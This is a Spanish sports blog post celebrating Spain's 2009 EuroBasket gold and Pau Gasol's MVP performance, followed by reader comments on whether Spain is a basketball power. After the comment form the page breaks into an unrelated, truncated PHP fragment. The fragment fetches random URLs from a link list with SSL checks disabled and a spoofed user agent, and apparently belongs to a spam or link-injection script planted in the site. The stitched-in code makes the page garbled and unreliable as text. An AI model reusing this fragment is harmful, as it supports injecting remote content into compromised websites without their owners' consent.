EuroNBAsket: Golden Men

21 de September de 2009 por TheDeerHunter

europodiumHa sido un Oro inapelable. El espíritu de Japón y Portugal regresó de golpe. No podemos estar más orgullosos de una selección nacional irrepetible, a la altura de los más grandes equipos de toda la historia. Queda de manifiesto la distancia sideral del baloncesto patrio actual con respecto al resto selecciones mundiales (menos una) y que el único rival que podía negar el título era la propia España. Mayor mérito ha sido dar la vuelta a una tortilla que inicialmente tuvo muy mala pinta. La fuerza mental de hombres como Raül López, Mumbrú, Cabezas, Garbajosa, Lull… o el mismísimo Ricky Rubio, con todo lo que les ha caído, ha resultado ser literalmente inquebrantable. Esa es, sin duda, una de las grandes bazas que les ha permitido alcanzar el cielo. La pasta de la que siempre ha estado hecha este grupo y que algunos se han permitido cuestionar más allá de lo fundamentado.

Todo ha quedado por escrito y cada uno ha quedado retratado. Es mala idea apostar en contra del caballo ganador. Seguro que estos Golden Men bajarán algún día de su olimpo. Me gustaría pensar que cuando tengamos que afrontar el verdadero final de esta era se recordarán momentos como éste a la hora de medir nuestras críticas. Por lo bajo que han llegado a caer algunos en dos partidos malos soy extremadamente pesimista por ese lado. Mientras todo eso llegue… ¡larga vida a los campeones!paujuanqui

El hombre del campeonato ha sido, sin lugar a dudas, Pau Gasol. 18.7 ppp 8.3 rebotes 2.2 tapones y 1.2 asistencias bien valen otro MVP más y el título virtual de mejor jugador FIBA del mundo. En el podio de, ni más ni menos, 11 categorías estadísticas y con la sensación de ni siquiera haber rendido a tope, sin mencionar las condiciones físicas en las que empezó el campeonato. Se ha convertido en el primer jugador que consigue el Anillo y el Eurobasket la misma temporada, y en uno de los únicos campeones de la NBA, mundial y europeo. Sólo le falta el oro olímpico (y nunca digáis nunca). Está claro que ha alcanzado la plenitud y su figura trasciende al mero ámbito baloncestístico. Es leyenda.

Curiosamente en el quinteto ideal del campeonato sólo Rudy Fernández acompaña al de Sant Boi como representante de la NBA, cuando por momentos habían sido estos jugadores los grandes dominadores del campeonato. El mallorquín, también inicialmente mermado, se ha marcado un campeonato superlativo en la posición de alero, destacando todavía más, si cabe, desde el punto de vista defensivo que ofensivo y merendándose a ilustres como Turkoglu, Nachbar, Batum, Zisis o Tepic. No me gusta decirlo pero en este aspecto quizás deberíamos acordarnos de McMillan, para bien por una vez.

spanoulislorbekEl resto de elegidos han sido los sorprendentes Erazem Lorbek y Milos Teodosic, junto a un Vasilis Spanoulis que  curiosamente ha resultado el más discutido de la votación. Queda bastante claro cuáles han sido los criterios de la organización a la hora de confeccionar la selección. En la clasificación se quedan las extraordinarias actuaciones del turco Ersan Ilyasova y de Tony Parker, como también, no lo olvidemos, de Marcin Gortat, quien sin duda merece el premio de “mayor esfuerzo en vano” del campeonato.

Como decepciones apuntamos a Turkoglu, que no ha llegado a rendir a su máximo nivel en ningún momento, además de Andris Biedrins y también, por qué no decirlo, Marc Gasol. Pese a todo, algunas malas actuaciones y ausencias tan notables como las de Nowitzki o Kirilenko, el orgullo de la NBA ha quedado inmaculado una vez más con la gigantesca actuación de Pau.

Comenta

30 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Enhorabuena a los campeones. Generación de oro. Grandes jugadores. Plantilla tremenda.
    Pau en lo más alto. El mejor Fiba junto a Robin Hood….

    En cuanto han jugado a más de 80 puntos son imparables. Ricky puede hacer carrera en la Nba…ya veremos hasta donde llega.

    Por cierto, Montes deja La Sexta….ya se comenta que puede volver a Digital+, un sueño?

    Pablo

      Citar

  2. Txusma dice:
    #2

    No creo que nunca ningún otro equipo de un juego colectivo me haga vibrar tanto como lo ha hecho este. Ni mis queridos Bulls…
    Fenomenal actuacion de la seleccion y de todos los jugadores que se quitaron de encima sus miedos a partir del partido de Litunia. Grandisimo Gasol, grandisimo Rudy, enorme Felipe Reyes (el espejo y modelo para cientos y cientos de jugadores q tal vez no tienen la calidad de los super cracks), genial Ricky (como sea capaz de aprender a jugar en estatico y mejore su tiro, sera imparable. Y solo tiene 18 años!), decisivo Navarro y fenomenales los Mumbru, Llull, Lopez, Cabezas, Marc, Garbajosa, etc…

    Gracias y gracias!!

      Citar

  3. toni dice:
    #3

    ¡Qué grandes!
    Este equipo juega como tiene que jugar con presión por lo que parece porque en los partidos a vida o muerte es cuando realmente se ha salido. Gran Navarro, mejor Rudy y espectacular Pau. Buenisimo encuentro de los 3 bases ayer, en el que hasta a ricky le entraban los triples…
    Nos quedan un par de torneos de la generación de los chicos de oro, disfrutemoslos.
    Ahora solo queda esperar a el inicio de la temporada NBA.

    Por favor, comentad si saveis algo de cuando pondran a la venta y donde las entradas para el Lakers-Regal en el Palau, gracias.

    Pablo, ¿es posible que Andres vuelva a canal+?
    Ayer en la retransmision comentó algo de que era una buena despedida de la sexta con un oro.

      Citar

  4. pcerezo dice:
    #4

    Toni,

    Es un sueño. He leído que corre un rumor de Montes, Daimiel y Segurola juntos otra vez.

    Soñar es gratis…

    Pablo

      Citar

  5. univerzee dice:
    #5

    Por ser quisquilloso yo creo que Lorbek si esta merecidamente en el 5 del campeonato y Teodosic también, aunque en la final estuviera anulado. A quien no veo es a Spanoulis, debe ser que es un jugador que no me gusta, creo que en ese puesto JCN estaría más merecidamente. Claro, que politica es politica.
    No sabia que había un Regal Barça vs LAL, os leo a ver que decis, me parece muy interesante, buen si es a final de octubre porque a principio de octubre no servirá para mucho.

      Citar

  6. TheDeerHunter dice:
    #6

    Para nada, Univerzee… Lorbek ha hecho un campeonato cojonudo… y Teodosic no te digo nada. la elección más reñida, en efecto hubiera podido ser la de Spanoulis.

    De todas formas, no creo ni que Lorbek haya hecho mejor campeonato que Ilyasova ni que Teodosic lo haya hecho mejor que Parker.
    En cualquier caso estoy razonablemente de acuerdo con ese quinteto. Soy bastante clásico en ese sentido.

      Citar

  7. Txusma dice:
    #7

    Ayer escuché a Salinas criticas abiertamente a la Sexta. Parece ser que nadie les había avisado (ni a él ni a Montes) que no continuarían retransmitiendo los partidos. No fue hasta q llamaron a la cadena para preguntar por primer partido (es un decir…) q no les comunicaron q no contaban con ellos.

    Sobre el qinteto. La presencia de Pau, Lorbek y Rudy creo es q indiscutible. Después ya sabemos que suelen poner a jugadores de algun equipo de los 4 primeros por lo q es muy dificil meter a Parker (q menos contra España, ha jugado a un nivel brutal). Meto a Teodosic por Parker pq ha de haber, por fuerza, un representante de la sorprendente Serbia en el quinteto. A mi Spanoulis no me chirria. De hecho Navarro me chirriaria más pq tampoco ha estado a un nivel sobrenatural (antes que a él a lo mejor metía a Lakovic, Ilyasova o Gortat). El griego, hasta encontrarse con España, estaba a un nivel altísimo y quieras que no también habrá que meter a un griego en el quinteto.

      Citar

  8. univerzee dice:
    #8

    Leyendo a Txusma me he acordado de Lakovic, que tal vez, podría estar en el quinteto por Spanoulis, aunque al final flojeo un poquito. Como dices, Deer, Illyasova y Parker también estuvieron bien, pero cayeron demasiado pronto, y entonces supongo que se quedan sin opciones. No obstante creo que el peso de Lorbek en el exito de Eslovenia es muy grande. No suelo seguir el basket europeo asíq ue me sorprendió, y me parece un muy buen fichaje por parte del Regal Barça, seguramente con mejor presente que Velickovic, aunque no con mejor futuro, espero 😛

      Citar

  9. univerzee dice:
    #9

    Como en todas las familias tenia que llegar el momento en que Lasexta empezara a hacer cosas tipicas y tratar mal al personal…
    Me he quedado un poco impactado con lo de Montes, sin duda Esteva va a ser un buen rollo escucharlo, similar a Luque, menos mal que ya no hay futbol en A3… pero Sauca en TVE1 no tiene desperdicio, malo o remalo.

      Citar

  10. M dice:
    #10

    Estoy bastante de acuerdo con el artículo y los comentarios. Pero, y sin haber leído muchas críticas, algunas de las cuales serían excesivas, supongo, creo que muchas críticas tras los primeros partidos estaban justificadísimas. No acabo de entender declraciones de Rudy y Reyes pasando facturas a los periodistas que dieron su opinión crítica los primeros días. Eso me ha decepcionado un poco. Y no creo que esas críticas fueran apuestas contra la selección, por Dios.

      Citar

  11. TheDeerHunter dice:
    #11

    Lo he tratado de explicar en otros ámbitos. Las críticas a ciertos aspectos del juego, la rotación, la configuración de la lista, la preparación, la dirección, etc… no sólo que están justificadas sino que eran absolutamente necesarias y constructivas.

    Pero es que otras voces no se han quedado ahí. Se ha dado cuerda a rumores sin fundamento extremadamente feos que llegaban a cuestionar la profesionalidad de gran parte de los jugadores que pocos días antes (y pocos días después) eran considerados casi héroes. Es muy típico de ciertos medios españoles buscar historias que rozan lo sensacionalista sobre todo en las derrotas, que es cuando más caldo de cultivo tienen.
    Lo más hipócrita que yo he observado estos días ha sido pintar al antaño “excelente grupo humano” ejemplo de todos en Japón en algo similar a una mafia calabresa, en la que los coleguis iban por decreto ley y los que estaban fuera del círculo de confianza eran cruelmente discriminados.
    Seguro que una parte de verdad hay en muchas cosas que se han dicho… pero la parte que se manipula y emponzoña para convertirlo en algo morboso que pueda justificar un simple mal momento es lo que lo convierte en “prensa basura”… a mi juicio. Creo que estos jugadores se han ganado un mínimo de respeto y el beneficio de la duda hasta en los peores momentos. Hay gente que no lo ha entendido así y es de lo que me quejo.
    En cualquier caso, como digo, cada uno se ha quedado retratado.
    Entiendo que Rudy y Reyes (y algún otro todavía con más motivo) estén molestos por el trato, lógicamente.

      Citar

  12. M dice:
    #12

    Ok, nada que objetar, seguramente es como dices, pero nunca me quito la impresión de que a cierto nivel, los deportistas de élite tienden a conllevar extremadamente mal cualquier crítica. Pero también supongo que con la prensa que hay por ahí, algunos se habrán pasado tres pueblos.

    Gracias por contestar 🙂 y enhorabuena por la página.

      Citar

  13. Kiki dice:
    #13

    Sobre nuestro PRIMER oro en un europeo, simplemente recordar los que NO han estado para darnos cuenta de la cantidad y calidad de jugadores que tenemos en la actualidad: J.CALDERÓN,SERGIO Rodríguez,V.Sada,BERNI R.,Saúl Blanco,R.Grimau,Pau Ribas,Carlos JIMÉNEZ,Sergi Vidal,G.Suárez,Fran VÁZQUEZ,G.Rubio,Sonseca,Olmos,Germán,Aguilar,Trías,…Y los de las inferiores,que hay mucho y bueno.
    Como le cantan los compañeros de la Davis a Nadal: “Gracias por ser español”.

      Citar

  14. univerzee dice:
    #14

    Pufff KIKI, como lo lea esto TheDeerHunter 😛 jaja. Personalmente creo que no somos tal potencia, pero ya lo dije en otros lados no voy a cansar aqui al personal.

      Citar

  15. TheDeerHunter dice:
    #15

    Bueno… yo tampoco creo que seamos una superpotencia baloncestística tan brutal como otras
    pero por algo se empieza y disponer de grandes campeones es un paso adelante

      Citar

  16. L.Casei dice:
    #16

    ¿Que no somos una potencia hoy en día?
    Me lo expliquen xD.

      Citar

  17. Óscar dice:
    #17

    Para mí somos la mayor potencia del Mundo actualmente tras EE.UU.
    Si no, ¿cómo podemos ganar un Europeo con esa autoridad desde cuartos (Fra,Srb,Gre) sin contar con 4 campeones del Mundo como Calde, Sergio, Berni o Jiménez, además de no llevar a un jugadorazo como Fran Vázquez?. Y eso sin hablar de las selecciones inferiores, que siempre están a gran nivel, a pesar de ser 10º en Nueva Zelanda porque nos faltaban varios postes, pero había un gran nivel.
    Desde el punto de vista de los últimos 5 años, si no somos una potencia, ¿qué son los demás?.

      Citar

  18. TheDeerHunter dice:
    #18

    No “hoy en día” ni actualmente. Decía en general… (esto lo debería explicar mejor Univerzee que yo=
    Ayer el As sacaba en portada el super-partidazo entre el Real Madrid y el Xerez en una esquinica lo de la medalla de Oro. ¿Pero alguien se imagina algo así en Serbia, Lituania, Rusia…??

    Sacamos pecho de esta generación tan cojonuda. Deberíais daros cuenta que es casi una anomalía en un país como el nuestro que aparezca de golpe una hornada de este nivel en un país sin demasiados campeones como precedente. ¿Es el mismo caso que Serbia, Lituania, Rusia, Eslovenia, Croacia…?? Pensadlo bien ¿las mismas estructuras formativas?? ¿el mismo interés?? ¿la misma salida a los jugadores?? ¿peso específico en la liga nacional?? ¿Alguien puede aportar información sobre el número de fichas federativas por nº de habitantes??
    Mi impresión es que no es así… aunque lo que están haciendo estos influirá para mejorar mucho, claro está.

    La aplicación práctica en lo que nos ocupa ahora es la hipotética renovación. Hay jugadores que cada vez les cuesta más aportar a estos niveles. Es evidente, aunque nos duela… Y no podemos hablar ya de Fran Vazquez para esto. Dudo mucho que se pueda contar con él en el futuro.
    Por fuera, aún podríamos pensar en interesantes recambios… pero por dentro la cosa está bastante peor.
    En cualquier caso es difícil imaginar que esto puede durar muchos años más y veremos cómo de dolorosa es la reconstrucción. Ya habéis visto lo que ha pasado con Serbia. Yo tengo muchas dudas de que la nuestra cuando llegue sea tan rápida.

      Citar

  19. M dice:
    #19

    Bueno, también es cierto que en Serbia han influído una serie de circunstancias trágicas excepcionales. Pero estoy bastante de acuerdo, aunque confío en que la Federación sepa aprovechar estos éxitos. Y lógicamente, la travesía del desierto que habrá que hacer será dura, inevitablemente, pero no creo que se vuelva a la indiferencia que había antes respecto al baloncesto cuando no conseguía éxitos.

    También creo que muchas generaciones excepcionales se encontraron con las dictaduras de URSS y Yugoslavia, y no parece que eso se vaya a repetir, y que volverá a haber gran igualdad. Aunque no volvamos a ser tan buenos en bastante tiempo, España tendrá opciones.

    Pero bueno, eso nunca se sabe…

      Citar

  20. kantonyo dice:
    #20

    Joder Deer, meter el Diario As en esto para demostrar que no es una superpotencia …… El “AS” hace tiempo que dejo de ser un periodico de información deportiva para convertirse en un panfleto de un equipo de futbol… Yo lo único que sé es que en todos los medios de comunicacion de información general si que tenían un gran espacio en su portada.

      Citar

  21. MagicJohnson32 dice:
    #21

    No estoy contigo, Deer. Yo creo que el baloncesto vive su mejor situación en España a todos los niveles, excepto en el tema mediático. En eso tiene un poco la culpa la ACB y la FEB, que no han sido demasiado inteligentes en sus estrategias, pero sobre todo los propios medios (y no sólo el As, que en el fondo son todos iguales), que limitan su información deportiva al fútbol y a lo que el héroe nacional de turno (Nadal, Alonso o quien sea) dé de sí.

    La realidad no es lo que aparece en los medios. La realidad es que las categorías inferiores de las selecciones masculinas y femeninas jamás habían tenido tanto éxito como ahora, y todo ello coincidiendo con las Absolutas femenina y masculina en el mejor momento de su historia. Desde luego que España es en la actualidad una superpotencia baloncestística.

      Citar

  22. TheDeerHunter dice:
    #22

    A ver… no mezclemos que es cierto que el baloncesto nacional vive su mejor momento (y no he dicho lo contrario… más bien al revés) con que de repente estamos a la altura de las Rusia, Lituania, Croacia, Yugoslavia, Slovenia… y quizás Grecia.
    Estas selecciones son una fábrica de churros constante. Hay un interés allí por el baloncesto que está literalmente a años luz de aquí, con todo el buen momento que pasamos (y que tiende a bajar)
    El año pasado sin ir más lejos, Yugoslavia se lo llevó todo en las selecciones inferiores.

    El ejemplo del AS es algo que roza lo cómico… no es que sea un hecho general pero algo de eso hay. Aquí algunas cosas se están haciendo bien… pero hay otras cosas que son un problema crónico. Y ahí tienes lo bien que se está explotando comercialmente el gran momento mediático de las estrellas nacionales (un cagarro como un piano, así de triste es) Es algo completamente inimaginable en los países que te he dicho.

    Hay un claro déficit de jugadores en categorías absolutas. Quita a “Los Excepcionales” de la generación de oro y veamos cuantos nacionales son líderes en la ACB y Europa. Estaría bien también estudiar la configuración de los equipo en cuanto a jugadores seleccionables se refiere… y lo peor de todo es que no parece que vaya a ir a mejor de forma súbita.
    Ahora hay quien dice que Garbajosa no debe de seguir, ni Mumbrú (ni Raul, ni Cabezas, aunque en esa posición la posición queda bien cubierta) Veamos que aleros de primerísimo nivel tenemos en la recámara (sin contar a Fran) y quienes vienen pegando fuerte. Enuméramelos… que yo no soy un experto del mercado europeo.

    Es importante que vayamos poniendo los pies en el suelo… que luego la caída puede ser desde muy alto en este caso. Cabeza fría, señores. Estos éxitos no son más que un paso adelante… ójala siga así.

      Citar

  23. sergio dice:
    #23

    Hombre… yo tampoco creo que estemos tan mal en jugadores de primer nivel comparando con otras selecciones. Aparte de bases, que tenemos el cupo mas que cubierto para unos cuantos años, creo que gente como Sergi Vidal, Fran Vazquez, Berni Rodriguez, Guillem Rubio, Victor Sada, Albert Miralles, Jordi Trias…, podría cubrir las plazas mas discutidas de la seleccion o aportar algo nuevo. Tambien la adaptación en unos años de gente como Victor Claver, Carlos Suarez, Pablo Aguilar o Pau Ribas puede dar algo bueno a la seleccion. Creo que el nucleo de la seleccion tiene cuerda para unos años (Pau aparte por su condicion de megaestrella) y que no podemos engañarnos en cuanto a calidad de los 5 o 6 “grandes” de la seleccion comparados con el resto, pero es que eso tambien pasa en todas las selecciones como Lituania, Grecia o Serbia (no porque hayan hecho un buen europeo creo que sean una seleccion potente ahora mismo). La unica duda que tengo es la forma en la que las nuevas generaciones de jugadores que estan triunfando en europa se adapten al juego en nuestro pais y vayan adoptando responsabilidades en el juego y mejorando sus cualidades. A nadie se nos debe escapar que gente como Gasol, Calderon, Rudy (quizas nuestros 3 mejores jugadores) en su epoca no eran mas que promesas que tuvieron confianza por parte de entrenadores y continuidad en el juego como para desarrollar aquellas cualidades que prometian.

    Por cierto… alguien sabe como les va a los Rookies en las ligas de verano?? o no han comenzado todavia??

      Citar

  24. TheDeerHunter dice:
    #24

    No insistáis con el momento específico… no estoy hablando de ello. Esta selección seguro que tiene cuerda para 5 o 6 años (en función de lo que alargue su carrera Pau Gasol, sobre todo)
    La situación actual es magnífica en todos los aspectos. Y aún así, de haber sido más grave lo del dedo o haberse producido más tarde hubieramos tenido serios problemas.

    ¿que es mejor que en otros países tipo Lituania o Serbia?? Bueno, tenemos un equipo circunstancialmente mejor a cualquier cosa. Pero en interés, fichas federativas, estructuras, desarrollo de los jugadores… lo más normal es que allí salgan más y mejores jugadores que aquí. Y así será, no lo dudes.
    Aquí lo que le pone al personal es el futbol… y aún así tampoco hay tanto caldo de cultivo como para considerarnos al nivel de Brasil, Argentina, Alemania…

    En fin… que lo iremos viendo. Yo puedo estar equivocado. Los USA, los balcánicos y los ex-soviéticos son otra historia y allí saldrán jugadores de super-élite toda la vida, en mayor o menor medida. Aquí saldrán buenos jugadores de vez en cuando y sólo si se alinean los astros volveremos a tener lo que hay ahora.
    Yo lo disfrutaré por si no lo vuelvo a ver nunca.

    PD: Las ligas de verano ya terminaron hace evos… lo único que recuerdo bien es que Morrison jugó de PM… del resto de los rookies creo que Tyreke Evans destacó mucho… y Griffin, aunque lo digo de memoria…

      Citar

  25. sergio dice:
    #25

    Tienes toda la razon en lo que dices y lo veo muy logico pero te hablare de los casos uno a uno:
    USA: Inventaron el baloncesto y creo que eso dice bastante sobre su concienciacion con este deporte, su desarrollo y su explotacion. Aparte de que no se me ocurre otro pais que cuente con las mismas posibilidades economicas, de población y tamaño como para organizar una liga como la NBA
    Balcanes: Realmente el baloncesto en los balcanes no es algo tan antiguo (refiriendome a la estructura que tiene actualmente) y, aparte de los equipos de club y sus victorias a nivel europeo (y eso que en España teniamos al equipo mas laureado de europa), el baloncesto se convirtio en un deporte mayoritario en la epoca del gran Kresimir Cosic, cuando empezaron a ganar cosas a nivel europeo, olimpico y mundial que es lo que estamos haciendo nosotros ahora…
    URSS: aparte de las ventajas fisicas de las razas rusas y de la antigua URSS en cuanto a altura y media de la poblacion hace unos años en comparacion con el resto de europa… creo que la maquinaria deportiva que pusieron en marcha a partir del final de la segunda guerra mundial para demostrar al mundo la superioridad del estado y de sus habitantes (quien no sabe algo de los duelos deportivos durante la Guerra Fria) hicieron del baloncesto ruso una de las secciones que mas alegrias daba y una en las que mas se invirtio para disminuir la ventaja de los americanos sobre el resto del mundo (hasta Munich 72). Por ello Lituania tambien se aprovecho de ello, y junto a victorias antiguas en competiciones europeas como las del Riga en la Copa de Europa de Basket y su continuidad han hecho que practicamente sea el unico deporte de equipo pratocinado por empresas potentes en Lituania (tambien deportes de hielo quizas)

    Al escribir esto no quiero decir que vayamos a convertirno en otra potencia historia en el baloncesto (que ojala me equivoque y lo logremos), pero el desarrollo del pais se ha visto reflejado en algunas parcelas deportivas y creo que en determinado deportes como pueden ser el tenis, el ciclismo, el balonmano, el futbol sala y el hockey patines somos potencias mundiales a la altura de las mas grandes y todos vinieron por victorias recordadas por mucha gente (Orantes y Santana, Indurain, el Barça de Balonmano en europa, victorias de futbol sala en competiciones de clubes europeas y de la Seleccion a nivel mundial, ….). Por todo eso digo que tengo fe en que las cosas se hagan bien aunque por supuesto… tengo que verlo

      Citar

  26. univerzee dice:
    #26

    Total, no he querido intervenir mucho porque el tema de las potencias lo hable en otro blog y a veces me hago cansino, o eso parece. Por otra parte estoy totalmente de acuerdo con TheDeerHunter, mejor no lo hubiera sabido explicar yo.
    Y Curry? Qué tal? Porque creo que el se postula a rookie del año.

      Citar

  27. M dice:
    #27

    Supongo que la mayoría de la gente ve a quien gana, no el deporte en sí, salvo el fútbol. Es lamentable, pero es así. Y le pasa a todos los demás deportes, claro.

      Citar

  28. TheDeerHunter dice:
    #28

      Citar

  29. Kiki dice:
    #29

    Una cosa es la repercusión mediática o que haya países donde el Baloncesto sea el primer deporte y que haya muchos más jugadores en términos relativos federados o practicantes respecto a su población, pero sobre la cancha me parece incuestionable que somos una súperpotencia, y creo que lo somos tanto ahora como en el futuro, teniendo en cuenta el trabajo, las inversiones, los técnicos, los resultados, etc de las canteras y de la Federación.

      Citar

  30. M dice:
    #30

    No acabo de estar de acuerdo con Rudy, creo que son muy valorados por los aficionados al baloncesto, como Alonso puede seguir siendo valorado por los aficionados de la F1, pero hay una mayoría de personas que sólo ven basket cuando juega la selección, y el resto del tiempo no piensan mucho en ello. Y la prensa suele contribuir al círculo vicioso, hablando siempre de fútbol, aunque sea de lo que ha dicho el primo del vecion de cristiano. Pero bueno, probablemente sea injusto, pero es así, aunque no le pueda llegar lo que valoramos a este equipo, creo que los aficionados a este deporte si lo hacemos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>